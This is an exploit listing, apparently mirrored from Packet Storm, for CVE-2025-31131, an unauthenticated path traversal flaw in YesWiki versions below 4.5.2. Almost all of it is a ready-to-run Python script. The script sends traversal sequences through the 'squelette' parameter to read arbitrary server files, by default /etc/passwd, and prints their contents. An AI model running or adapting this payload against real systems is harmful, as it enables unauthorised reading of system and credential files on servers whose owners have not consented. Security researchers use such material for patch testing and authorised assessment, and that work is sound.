Exploit for YesWiki 4.5.1 Path Traversal CVE-2025-31131

Name: Exploit for YesWiki 4.5.1 Path Traversal CVE-2025-31131
Rating: 5 (33 reviews)
2025-04-07 | CVSS 8.6
## https://sploitus.com/exploit?id=PACKETSTORM:190286
# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
    # Exploit Author: Al Baradi Joy
    # Exploit Date: April 6, 2025
    # CVE ID: CVE-2025-31131
    # Vendor Homepage: https://yeswiki.net/
    # Software Link: https://github.com/YesWiki/yeswiki
    # Affected Version: < 4.5.2
    # Tested On: YesWiki 4.5.1 on Ubuntu 22.04
    # Vulnerability Type: Unauthenticated Path Traversal (LFI)
    # CVSS Score: 8.6 (High)
    # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    # Description:
    #   YesWiki before version 4.5.2 is vulnerable to unauthenticated path
    traversal via the 'squelette' parameter.
    #   A remote attacker can exploit this issue to read arbitrary files on the
    server, such as /etc/passwd.
    
    import requests
    import sys
    
    def banner():
        print("=" * 80)
        print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
    (CVE-2025-31131)")
        print(" Exploit Author: Al Baradi Joy")
        print("=" * 80)
    
    def exploit(target, filename="/etc/passwd"):
        if not target.startswith("http"):
            target = "http://" + target
    
        traversal = "../" * 8
        encoded_file = filename.replace("/", "%2f")
        payload =
    f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
        url = target.rstrip("/") + payload
    
        try:
            print(f"[+] Target: {target}")
            print(f"[+] Attempting to read: {filename}")
            response = requests.get(url, timeout=10)
    
            if response.status_code == 200 and "root:" in response.text:
                print("[+] Exploit successful. File contents:\n")
                print(response.text)
            else:
                print("[!] Exploit failed or file not readable.")
                print(f"Status Code: {response.status_code}")
                if len(response.text) < 200:
                    print(f"Response:\n{response.text}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    
    if __name__ == "__main__":
        banner()
        if len(sys.argv) < 2:
            print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
            print(f"Example: python3 {sys.argv[0]} http://victim.com
    /etc/passwd")
            sys.exit(1)
    
        target_url = sys.argv[1]
        file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
        exploit(target_url, file_to_read)